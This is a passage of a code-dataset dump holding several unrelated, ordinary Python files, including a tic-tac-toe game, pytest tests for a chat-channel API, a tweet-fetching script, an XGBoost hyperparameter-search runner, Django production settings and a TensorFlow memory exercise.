operation=NSCompositeSourceOver, fraction=1\n    )\n    composed_image.unlockFocus()\n    ctx.restoreGraphicsState()\n\n    image_view_impl.native.image = composed_image\n\n\ndef resize_image_to(image: NSImage, height: int) -> NSImage:\n\n    new_size = NSMakeSize(height, height)\n    new_image = NSImage.alloc().initWithSize(new_size)\n    new_image.lockFocus()\n    image.size = new_size\n\n    ctx = NSGraphicsContext.currentContext\n    ctx.saveGraphicsState()\n    ctx.imageInterpolation = NSImageInterpolationHigh\n\n    image.drawAtPoint(\n        NSZeroPoint,\n        fromRect=CGRectMake(0, 0, new_size.width, new_size.height),\n        operation=NSCompositingOperationCopy,\n        fraction=1.0,\n    )\n\n    new_image.unlockFocus()\n    ctx.restoreGraphicsState()\n\n    return new_image\n","sub_path":"src/maestral_cocoa/private/implementation/cocoa/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":25936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"273630313","text":"from cing.Libs.jsonTools.handlers import BaseHandler\nfrom cing.Libs.jsonTools import tags\n\n__author__ = 'geerten'\n\n### Separate files because of cyclic imports otherwise??\n#GWV\nclass Metadata(dict):\n    \"\"\"\n    just a container to be able to define a handler\n    \"\"\"\n#end class\n\nclass MetadataJsonHandler(BaseHandler):\n    \"\"\"\n    Handler for the Metadata;\n    on decode, adds an instance as an attribute of the context for\n    subsequent usage\n    \"\"\"\n    def flatten(self, obj, data):\n        flatten = self.context.flatten\n        for k,v in obj.items():\n            data[k] = flatten(v,reset=False)\n        return data\n\n    def restore(self, data):\n        data.pop(tags.OBJECT)\n        restore = self.context.restore\n        mdata = Metadata()\n        for k in data.keys():\n            mdata[k] = restore(data[k])\n        #end for\n        # add to context\n        setattr(self.context,'metadata', mdata)\n        return mdata\n    #end def\n#end class\nMetadataJsonHandler.handles(Metadata)\n\n","sub_path":"cing/python/cing/Libs/jsonTools/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"204554413","text":"print(\"Tic-tac-toe\")\nfield = ['.', '.', '.',\n         '.', '.', '.',\n         '.', '.', '.']\n\ngame_continues = True\ncurrent_player = \"X\"\nwinner = None\n\ndef display_field():\n    print(field[0] + \" \" + field[1] + \" \" + field[2])\n    print(field[3] + \" \" + field[4] + \" \" + field[5])\n    print(field[6] + \" \" + field[7] + \" \" + field[8])\n\ndef play_game():\n    display_field()\n    while game_continues:\n        handle_turn(current_player)\n        check_game_over()\n        change_player()\n    if winner == \"X\" or winner == \"O\":\n        print(\"Winner: \" + winner)\n    elif winner is None:\n        print(\"It's a tie\")\n\ndef handle_turn(player):\n    print(\"Turn: \" + player)\n    position = input(\"Enter a value from 1 to 9: \")\n    valid = False\n    while not valid:\n        while position not in [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n            position = input(\"Please enter a value from 1 to 9: \")\n        position = int(position) - 1\n        if field[position] == \".\":\n            valid = True\n        else:\n            print(\"That move cannot be made! 
Try again!\")\n    field[position] = player\n    display_field()\n\ndef check_game_over():\n    check_win()\n    check_tie()\n\ndef check_win():\n    global winner\n    row_winner = check_rows()\n    column_winner = check_columns()\n    diagonal_winner = check_diagonals()\n    if row_winner:\n        winner = row_winner\n    elif column_winner:\n        winner = column_winner\n    elif diagonal_winner:\n        winner = diagonal_winner\n    else:\n        winner = None\n    return\n\ndef check_rows():\n    global game_continues\n    row_1 = field[0] == field[1] == field[2] != \".\"\n    row_2 = field[3] == field[4] == field[5] != \".\"\n    row_3 = field[6] == field[7] == field[8] != \".\"\n    if row_1 or row_2 or row_3:\n        game_continues = False\n    if row_1:\n        return field[0]\n    elif row_2:\n        return field[3]\n    elif row_3:\n        return field[6]\n    return\n\ndef check_columns():\n    global game_continues\n    column_1 = field[0] == field[3] == field[6] != \".\"\n    column_2 = field[1] == field[4] == field[7] != \".\"\n    column_3 = field[2] == field[5] == field[8] != \".\"\n    if column_1 or column_2 or column_3:\n        game_continues = False\n    if column_1:\n        return field[0]\n    elif column_2:\n        return field[1]\n    elif column_3:\n        return field[2]\n    return\n\ndef check_diagonals():\n    global game_continues\n    diagonal_1 = field[0] == field[4] == field[8] != \".\"\n    diagonal_2 = field[6] == field[4] == field[2] != \".\"\n    if diagonal_1 or diagonal_2:\n        game_continues = False\n    if diagonal_1:\n        return field[0]\n    elif diagonal_2:\n        return field[6]\n    return\n\ndef check_tie():\n    global game_continues\n    if \".\" not in field:\n        game_continues = False\n    return\n\ndef change_player():\n    global current_player\n    if current_player == \"X\":\n        current_player = \"O\"\n    elif current_player == \"O\":\n        current_player = \"X\"\n    return\n\nplay_game()","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"217006015","text":"#!/usr/bin/python\n\n#\n# ============================================================================\n#\n#    06.11.17   <--  Date of Last Modification.\n#                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ----------------------------------------------------------------------------\n#\n#  ACEDRG EXECUTABLE MODULE\n#\n#  Command-line:\n#     ccp4-python -m pycofe.tasks.makeligand exeType jobDir jobId\n#\n#  where:\n#    exeType  is either SHELL or SGE\n#    jobDir   is path to job directory, having:\n#      jobDir/output  : directory receiving output files with metadata of\n#                       all successful imports\n#      jobDir/report  : directory receiving HTML report\n#\n#  Copyright (C)  Eugene Krissinel, Andrey Lebedev 2017\n#\n# ============================================================================\n#\n\n#  python native imports\nimport os\n\n#  application imports\nimport basic\n\n\n# ============================================================================\n# Make Ligand driver\n\nclass MakeLigand(basic.TaskDriver):\n\n    def smiles_file_path(self): return \"smiles.smi\"\n\n    # ------------------------------------------------------------------------\n\n    def run(self):\n\n        # Prepare makeligand input\n        # fetch input data\n\n        sourceKey = self.getParameter ( self.task.parameters.SOURCE_SEL )\n\n        if sourceKey == \"S\":\n            smiles = self.getParameter ( self.task.parameters.SMILES )\n            code   = self.getParameter ( self.task.parameters.CODE ).upper()\n\n            f = open ( self.smiles_file_path(),'w' )\n            f.write ( smiles + '\\n' )\n            f.close ()\n\n            # make command-line parameters\n            cmd = [ \"-i\",self.smiles_file_path(),\n                    
\"-r\",code,\"-o\",code ]\n\n else:\n code = self.getParameter ( self.task.parameters.CODE3 ).upper()\n cmd = [ \"-c\",os.path.join(os.environ[\"CCP4\"],\"lib\",\"data\",\"monomers\",\n code[0].lower(),code + \".cif\" ),\n \"-r\",code,\"-o\",code ]\n\n if self.outputFName == \"\":\n self.outputFName = code.upper()\n\n # Start makeligand\n self.runApp ( \"acedrg\",cmd )\n\n xyzPath = code + \".pdb\"\n cifPath = code + \".cif\"\n\n self.finaliseLigand ( code,xyzPath,cifPath )\n\n # close execution logs and quit\n self.success()\n return\n\n\n# ============================================================================\n\nif __name__ == \"__main__\":\n\n drv = MakeLigand ( \"\",os.path.basename(__file__) )\n drv.start()\n","sub_path":"pycofe/tasks/makeligand.py","file_name":"makeligand.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"232397616","text":"#pylint: disable=missing-docstring\n#pylint: disable=unused-variable\n\nimport pytest\nfrom functions.auth_functions import auth_register\nfrom functions.channel_functions import channels_create, channel_invite\nfrom functions.data import reset_data, is_member\n\nfrom functions.exceptions import ValueError\n\n#The only channels and users that exist are those created from\n#this test. When you create a channel you join it.\n######################## BEGIN SETUP ######################\ndef setup():\n reset_data()\n dict1 = auth_register('email1@gmail.com', 'validpass', 'Yasin', 'Kevin')\n token1 = dict1['token']\n u_id1 = dict1['u_id']\n\n dict2 = auth_register('email2@gmail.com', 'validpass', 'Peter', 'Steven')\n token2 = dict2['token']\n u_id2 = dict2['u_id']\n\n dict3 = auth_register('email3@gmail.com', 'validpass', 'Yasin', 'Peter')\n token3 = dict3['token']\n u_id3 = dict3['u_id']\n\n return token1, u_id1, token2, u_id2, token3, u_id3\n########################## END SETUP ########################\n\n\n#invite second user(member) to public channel created by first user(admin)\ndef test_channel_invite_test_1():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel['channel_id']\n\n assert channel_invite(token1, channel_id1, u_id2) == {}\n assert is_member(u_id2, channel_id1)\n\n\n#invite first user(admin) to private channel created by second user(member)\ndef test_channel_invite_test_2():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel = channels_create(token2, 'someChannel', 'false')\n channel_id1 = channel['channel_id']\n\n assert channel_invite(token2, channel_id1, u_id1) == {}\n assert is_member(u_id1, channel_id1)\n\n\n#invite multiple people (2 users)\ndef test_channel_invite_test_3():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel['channel_id']\n\n assert channel_invite(token1, channel_id1, u_id2) == {}\n assert channel_invite(token1, channel_id1, u_id3) == {}\n\n assert is_member(u_id2, channel_id1)\n assert is_member(u_id3, channel_id1)\n\n#inviting user to channel with a channel_id that does not exist i.e.\n#(channel_id1 + channel_id2)\ndef test_channel_invite_test_4():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel1 = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel1['channel_id']\n\n channel2 = channels_create(token1, 'someChannel2', 'true')\n channel_id2 = channel2['channel_id']\n\n with 
pytest.raises(ValueError):\n channel_invite(token1, channel_id1 + channel_id2, u_id2)\n\n#inviting user with user_id that does not exist (U_id1 + u_id2)\ndef test_channel_invite_test_5():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel1 = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel1['channel_id']\n\n channel2 = channels_create(token1, 'someChannel2', 'true')\n channel_id2 = channel2['channel_id']\n\n with pytest.raises(ValueError):\n channel_invite(token1, channel_id2, u_id1 + u_id2)\n\n#both user_id and channel_id do not exist\ndef test_channel_invite_test_6():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel1 = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel1['channel_id']\n\n channel2 = channels_create(token1, 'someChannel2', 'true')\n channel_id2 = channel2['channel_id']\n\n with pytest.raises(ValueError):\n channel_invite(token1, channel_id1 + channel_id2, u_id1 + u_id2)\n\n\n\n#user is already in the channel so cant invite himself\ndef test_channel_invite_test_7():\n token1, u_id1, token2, u_id2, token3, u_id3 = setup()\n channel = channels_create(token1, 'someChannel', 'true')\n channel_id1 = channel['channel_id']\n\n with pytest.raises(ValueError):\n channel_invite(token1, channel_id1, u_id1)\n","sub_path":"backend/channel_invite_test.py","file_name":"channel_invite_test.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"240800549","text":"#!/usr/bin/env python\n\"\"\"Implements math functions without using operators except for '+' and '-' \"\"\"\n\n__author__ = \"earthhadjo\"\n\nimport sys\n\n\ndef add(x, y):\n \"\"\"Add two integers. Handles negative values.\"\"\"\n return(x + y)\n\n\ndef multiply(x, y):\n \"\"\"Multiply x with y. 
Handles negative values of x or y.\"\"\"\n    if y < 0:\n        result = -multiply(x, -y)\n    elif y == 0:\n        result = 0\n    elif y == 1:\n        result = x\n    else:\n        result = x + multiply(x, y - 1)\n    return(result)\n\n\ndef power(x, n):\n    \"\"\"Raise x to power n, where n >= 0\"\"\"\n    if n == 0:\n        return(1)\n    result = x\n    i = 1\n    while i < n:\n        result = multiply(result, x)\n        i += 1\n    return(result)\n\n\ndef factorial(x):\n    \"\"\"Compute factorial of x, where x > 0\"\"\"\n    n = 1\n    i = 1\n    while i <= x:\n        n = multiply(n, i)\n        i += 1\n    return(n)\n\n\ndef fibonacci(n):\n    \"\"\"Compute the nth term of the fibonacci sequence (fib(0) = 0, fib(1) = 1)\"\"\"\n    x = 0\n    y = 1\n    for _ in range(n):\n        # advance the pair (fib(k), fib(k+1)) one step\n        x, y = y, add(x, y)\n    return(x)\n\n\ndef main():\n    print(add(2, 4))\n    print(multiply(6, -8))\n\n    print(power(2, 8))\n    print(factorial(4))\n    print(fibonacci(8))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"152638390","text":"import tweepy\nfrom tweepy import RateLimitError\nimport time\nimport json\nimport csv\n\ndef authTwitter():\n    twitter_auth_data = open(\"twitter_auth_data.json\").read()\n    twitter_auth_data_json = json.loads(twitter_auth_data)\n\n    access_token = twitter_auth_data_json[\"access_token\"]\n    access_token_secret = twitter_auth_data_json[\"access_token_secret\"]\n    consumer_key = twitter_auth_data_json[\"consumer_key\"]\n    consumer_secret = twitter_auth_data_json[\"consumer_secret\"]\n\n    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n    auth.set_access_token(access_token, access_token_secret)\n    api = tweepy.API(auth)\n\n    return api\n\n\ndef loadUrls(file_path):\n    \"\"\"\n    file_path: path to an SNScrape output file\n    Takes a file from SNScrape and loads the URLs into a list.\n    Return: list of urls\n    \"\"\"\n    with open(file_path) as f:\n        urls = f.readlines()\n\n    return [url.strip() for url in urls]\n\n\ndef getTweetId(url):\n    return url.split('/')[-1]\n\ndef getTweet(api, url):\n\n    tweetid = getTweetId(url)\n\n    try:\n        status = api.get_status(tweetid, tweet_mode=\"extended\")\n        return parseTweet(status)\n\n    except RateLimitError:\n        print(\"Rate limit triggered. 
Sleeping for 15 minutes\")\n        time.sleep(60 * 15)\n        return getTweet(api, url)  # retry once the rate-limit window has reset\n\ndef parseTweet(status):\n\n    data = {\n        \"id\": status.id,\n        \"username\": status.user.screen_name,\n        \"text\": status.full_text.replace('\\n', ''),\n        \"date\": str(status.created_at),\n        \"location\": status.user.location\n    }\n\n    return data\n\ndef generateCSV(tweet_list, output_path):\n    data_file = open(output_path, 'w')\n    csv_writer = csv.writer(data_file)\n\n    header = tweet_list[0].keys()\n    csv_writer.writerow(header)\n\n    for tweet in tweet_list:\n        csv_writer.writerow(tweet.values())\n\n    data_file.close()  # close() must be called, not merely referenced\n\n\nif __name__ == \"__main__\":\n\n    urls = loadUrls('test.txt')\n    api = authTwitter()\n\n    tweets = []\n    status_counter = 0\n    for url in urls:\n        tweets.append(getTweet(api, url))\n        if status_counter % 5 == 0:\n            print(f\"Completed: {status_counter}/{len(urls)}\")\n        status_counter += 1\n\n    generateCSV(tweets, 'tweetdata.csv')\n\n\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"550895354","text":"'''Runs DE on XGBoostBenchmark\n'''\n\nimport os\nimport sys\nsys.path.append(os.path.join(os.getcwd(), '../HPOlib3/'))\n\nimport json\nimport pickle\nimport argparse\nimport numpy as np\n\nfrom hpolib.benchmarks.ml.xgboost_benchmark import XGBoostBenchmark as Benchmark\nfrom hpolib.util.openml_data_manager import get_openmlcc18_taskids\n\nfrom dehb import DE, AsyncDE\n\n\n# task_ids = get_openmlcc18_taskids()\ntask_ids = [126031, 189906, 167155]  # as suggested by Philip\n\n\ndef save_configspace(cs, path, filename='configspace'):\n    fh = open(os.path.join(path, '{}.pkl'.format(filename)), 'wb')\n    pickle.dump(cs, fh)\n    fh.close()\n\n\n# Common objective function for DE representing XGBoostBenchmark\ndef f(config, budget=None):\n    global n_estimators, max_budget\n    if budget is None:\n        budget = max_budget\n    res = b.objective_function(config, n_estimators=n_estimators, subsample=budget)\n    fitness = res['function_value']\n    cost = res['cost']\n    return fitness, cost\n\n\ndef calc_test_scores(runtime, history):\n    global n_estimators\n    regret_validation = []\n    regret_test = []\n    inc = np.inf\n    for i in range(len(history)):\n        config, valid_score, _ = history[i]\n        if valid_score < inc:\n            inc = valid_score\n            config = de.vector_to_configspace(config)\n            test_res = b.objective_function_test(config, n_estimators=n_estimators)\n            test_score = test_res['function_value']\n        regret_test.append(test_score)\n        regret_validation.append(inc)\n    runtime = np.cumsum(runtime).tolist()\n    res = {}\n    res['regret_validation'] = regret_validation\n    res['regret_test'] = regret_test\n    res['runtime'] = runtime\n    return res\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--fix_seed', default='False', type=str, choices=['True', 'False'],\n                    nargs='?', help='seed')\nparser.add_argument('--run_id', default=0, type=int, nargs='?',\n                    help='unique number to identify this run')\nparser.add_argument('--runs', default=None, type=int, nargs='?', help='number of runs to perform')\nparser.add_argument('--run_start', default=0, type=int, nargs='?',\n                    help='run index to start with for multiple runs')\nparser.add_argument('--task_id', default=task_ids[0], type=int,\n                    help=\"specify the OpenML task id to run on from among {}\".format(task_ids))\nparser.add_argument('--n_estimators', default=64, type=int,\n                    help=\"specify the number of estimators XGBoost will be trained with\")\nparser.add_argument('--gens', default=100, 
type=int, nargs='?',\n help='(iterations) number of generations for DE to evolve')\nparser.add_argument('--output_path', default=\"./results\", type=str, nargs='?',\n help='specifies the path where the results will be saved')\nparser.add_argument('--pop_size', default=20, type=int, nargs='?', help='population size')\nstrategy_choices = ['rand1_bin', 'rand2_bin', 'rand2dir_bin', 'best1_bin', 'best2_bin',\n 'currenttobest1_bin', 'randtobest1_bin',\n 'rand1_exp', 'rand2_exp', 'rand2dir_exp', 'best1_exp', 'best2_exp',\n 'currenttobest1_exp', 'randtobest1_exp']\nparser.add_argument('--strategy', default=\"rand1_bin\", choices=strategy_choices,\n type=str, nargs='?',\n help=\"specify the DE strategy from among {}\".format(strategy_choices))\nparser.add_argument('--mutation_factor', default=0.5, type=float, nargs='?',\n help='mutation factor value')\nparser.add_argument('--crossover_prob', default=0.5, type=float, nargs='?',\n help='probability of crossover')\nparser.add_argument('--max_budget', default=1, type=float,\n help='the maximum budget for the benchmark')\nparser.add_argument('--verbose', default='False', choices=['True', 'False'], nargs='?', type=str,\n help='to print progress or not')\nparser.add_argument('--folder', default=None, type=str, nargs='?',\n help='name of folder where files will be dumped')\nparser.add_argument('--async_strategy', default=None, type=str, nargs='?',\n choices=['deferred', 'immediate', 'random', 'worst'],\n help='type of Asynchronous DE')\n\nargs = parser.parse_args() \nargs.verbose = True if args.verbose == 'True' else False\nargs.fix_seed = True if args.fix_seed == 'True' else False\nn_estimators = args.n_estimators\nmax_budget = args.max_budget\n\ntask_ids = get_openmlcc18_taskids()\nif args.task_id not in task_ids:\n raise ValueError(\"Incorrect task ID. 
Choose from: {}\".format(task_ids)\n\nb = Benchmark(task_id=args.task_id)\n# Parameter space to be used by DE\ncs = b.get_configuration_space()\ndimensions = len(cs.get_hyperparameters())\n\nif args.async_strategy is None:\n folder = \"de_pop{}\".format(args.pop_size)\nelse:\n folder = \"ade_{}_pop{}\".format(args.async_strategy, args.pop_size)\noutput_path = os.path.join(args.output_path, str(args.task_id), folder)\nos.makedirs(output_path, exist_ok=True)\n\n# Initializing DE object\nif args.async_strategy is None:\n de = DE(cs=cs, dimensions=dimensions, f=f, pop_size=args.pop_size,\n mutation_factor=args.mutation_factor, crossover_prob=args.crossover_prob,\n strategy=args.strategy, budget=max_budget)\nelse:\n de = AsyncDE(cs=cs, dimensions=dimensions, f=f, pop_size=args.pop_size,\n mutation_factor=args.mutation_factor, crossover_prob=args.crossover_prob,\n strategy=args.strategy, budget=max_budget, async_strategy=args.async_strategy)\n\nif args.runs is None: # for a single run\n if not args.fix_seed:\n np.random.seed(args.run_id)\n # Running DE iterations\n traj, runtime, history = de.run(generations=args.gens, verbose=args.verbose)\n fh = open(os.path.join(output_path, 'run_{}.json'.format(args.run_id)), 'w')\n json.dump(calc_test_scores(runtime, history), fh)\n fh.close()\nelse: # for multiple runs\n for run_id, _ in enumerate(range(args.runs), start=args.run_start):\n if not args.fix_seed:\n np.random.seed(run_id)\n if args.verbose:\n print(\"\\nRun #{:<3}\\n{}\".format(run_id + 1, '-' * 8))\n # Running DE iterations\n traj, runtime, history = de.run(generations=args.gens, verbose=args.verbose)\n fh = open(os.path.join(output_path, 'run_{}.json'.format(run_id)), 'w')\n json.dump(calc_test_scores(runtime, history), fh)\n fh.close()\n if args.verbose:\n print(\"Run saved. 
Resetting...\")\n # essential step to not accumulate consecutive runs\n de.reset()\n\nsave_configspace(cs, output_path)\n","sub_path":"dehb/examples/cc18/run_de_cc18.py","file_name":"run_de_cc18.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"417514294","text":"\"\"\"\nSettings file used in production\n\"\"\"\n\nfrom .base import *\n\nDEBUG = False\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'sentinel/sentinel/static')\n\nALLOWED_HOSTS = ['localhost']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'sentineldb',\n 'USER': get_secret_setting('DB_USERNAME'),\n 'PASSWORD': get_secret_setting('DB_PASSWORD'),\n 'HOST': 'localhost',\n 'PORT': '3306',\n }\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '[%(asctime)s] %(levelname)s\\t[%(name)s:%(lineno)s] '\n '%(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S'\n },\n 'detail': {\n 'format': '[%(asctime)s] %(levelname)s\\t%(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'detail'\n },\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'filename': '/var/log/sentinel.log',\n 'formatter': 'detail',\n },\n 'db_logger': {\n 'class': 'system.db.log_handler.DatabaseLogHandler',\n 'formatter': 'detail'\n }\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n 'device': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n 'sensor': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n 'notify': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n 'settings': {\n 'handlers': ['file', 'db_logger'],\n 'level': 'INFO',\n },\n },\n}\n","sub_path":"sentinel/sentinel/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"281272288","text":"import asyncio\nimport json\nfrom autobahn.asyncio.websocket import WebSocketServerProtocol\nfrom web.server.requestToResponder import getResponder\n\n\nclass ServerProtocol(WebSocketServerProtocol):\n\n # ERROR TYPE CODES\n ERROR_NO_MESSAGE_TYPE = \"MessageType not given in request.\"\n ERROR_NO_RESPONDER = \"Could not find appropriate Responder.\"\n ERROR_NO_PAYLOAD = \"Message contained no payload.\"\n ERROR_NOT_STRUCTURED = \"Message payload was not structured.\"\n\n def __init__(self):\n WebSocketServerProtocol.__init__(self)\n self.requestID = \"\"\n\n def onConnect(self, requestID):\n self.requestID = requestID\n\n @asyncio.coroutine\n def onMessage(self, payload, isBinary):\n if isBinary:\n return\n requestJSON = json.loads(payload.decode(\"utf-8\"))\n print(\"Client -> Server : {}\".format(requestJSON))\n\n if \"messageType\" not in requestJSON:\n self.sendError(ServerProtocol.ERROR_NO_MESSAGE_TYPE)\n return\n if \"payload\" not in requestJSON:\n self.sendError(ServerProtocol.ERROR_NO_PAYLOAD)\n return\n\n responderClass = getResponder(requestJSON[\"messageType\"])\n if responderClass is None:\n self.sendError(ServerProtocol.ERROR_NO_RESPONDER)\n return\n responder = responderClass(self.requestID, requestJSON[\"payload\"])\n if not responder.isRequestStructured(requestJSON[\"payload\"].keys()):\n 
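# payload keys do not match what this responder expects; sendError reports it and closes the connection\n 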
self.sendError(ServerProtocol.ERROR_NOT_STRUCTURED)\n return\n response = yield from responder.getResponse()\n if response is not None:\n responseJSON = {\"messageType\": responder.responseType, \"payload\": response}\n print(\"Client <- Server : {}\".format(responseJSON))\n self.sendMessage(json.dumps(responseJSON).encode(\"utf-8\", \"ignore\"))\n\n def sendError(self, errorCode):\n \"\"\"\n Sends an error message to the client with\n the corresponding code.\n\n :param errorCode: Error type to send to client.\n :return: None\n \"\"\"\n errorResponse = json.dumps({\"messageType\": \"error\", \"payload\": {\"reason\": errorCode}})\n print(\"Client <- Server : {}\".format(errorResponse))\n self.sendMessage(errorResponse.encode(\"utf-8\", \"ignore\"))\n self.sendClose(1000)\n","sub_path":"web/server/serverProtocol.py","file_name":"serverProtocol.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"392258046","text":"'''\nGiven a 32-bit signed integer, reverse digits of an integer.\n\nInput: 123\nOutput: 321\n\nInput: -123\nOutput: -321\n\nInput: 120\nOutput: 21\n\nInput: 2**31 - 1 \nOutput: 0 \n\n''' \n\n# O(log(x)), space O(1)\n\ndef reverse(x):\n reverse = 0 \n negative = x < 0 \n \n if negative: \n x *= -1 \n \n while x > 0: \n reverse *= 10 #push\n reverse += x % 10 #push and pop (x%10) \n x //= 10 # continue pop operation\n \n if negative: \n reverse *= -1\n \n if reverse > 2**31-1 or reverse < -2**31: \n return 0 \n \n return reverse \n\n\nprint(reverse(123)) # 321\nprint(reverse(-123)) # -321\nprint(reverse(-2147483648)) # 0\nprint(reverse(2147483647)) # 0\n","sub_path":"LeetCode/ReverseInteger.py","file_name":"ReverseInteger.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"179540033","text":"from multiprocessing import Process, Lock\r\n\r\nclass SMS_split(object):\r\n '''split the sms_list for sending '''\r\n def __init__(self,package_size,phone_list):\r\n self.phone_list = phone_list\r\n self.package_size = package_size\r\n self.package = [elem for elem in range(package_size)] \r\n self._lock = Lock()\r\n \r\n def __iter__(self):\r\n # the number of sms that have already been split\r\n self.current_spot = 0\r\n return self\r\n \r\n def next(self):\r\n self._lock.acquire()\r\n try:\r\n if (self.current_spot >= len(self.phone_list)):\r\n self.current_spot = len(self.phone_list)\r\n raise StopIteration\r\n self.package = self.phone_list[self.current_spot : \\\r\n\t\t\t\t\t\t\t\t\t\t self.current_spot+self.package_size]\r\n self.current_spot += self.package_size\r\n finally: \r\n self._lock.release()\r\n return self.package\r\n\r\n def set_package_size(self, package_size):\r\n self.package_size = package_size\r\n def get_package_size(self):\r\n return self.package_size\r\n\r\n def get_already_send_num(self):\r\n return self.current_spot\r\n\r\nif __name__ == \"__main__\":\r\n a = [elem for elem in range(13000000000,13000000500,1)]\r\n\r\n tmp = SMS_split(32,a)\r\n for elem in tmp:\r\n tmp.set_package_size(tmp.get_package_size()*2)\r\n print (elem,\" : \",len(elem))\r\n","sub_path":"spliter/sms_splite/sms_splite.py","file_name":"sms_splite.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"337864133","text":"import tensorflow as tf \nimport numpy as np \nimport resource\n\n\n# This function will 
convert the reported RAM usage (in KB) to GB or MB \ndef convert_KB(val):\n\n\tresult = 0.0\n\n\t# Convert KB to GB\n\tif val >= 1048576:\n\t\tresult = val/1048576\n\t\treturn \"Used {}GB of RAM\".format(round(result,2))\n\t\n\t# Convert KB to MB\n\telse:\n\t\tresult = val/1024\n\t\treturn \"Used {}MB of RAM\".format(round(result,2))\n\n\nprint(\"EXERCISE 1\",end='\\n\\n')\nprint(\"Create a large matrix (at least 10,000,000) of integer values (for example, use NumPy’s randint function). Check the memory usage after the matrix is created. Then, convert the matrix to float values using TensorFlow’s to_float function. Check the memory usage again to see an increase in memory usage of more than double. The “doubling” is caused by a copy of the matrix being created, but what is the cause of the “extra increase”?\",end='\\n\\n')\n\nsession = tf.InteractiveSession()\n\n# build a 1000 x 10000 matrix (10,000,000 values) as the exercise asks, rather than a single random scalar\ntensor_arr = tf.constant(np.random.randint(0, 100, size=(1000, 10000)))\n\n#print(tensor_arr.eval())\n\nprint(convert_KB(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss))\n\ntensor_arr = tf.to_float(tensor_arr)\n\n#print(tensor_arr.eval())\n\nprint(convert_KB(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss))\n\nsession.close()","sub_path":"Interactive Session/Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
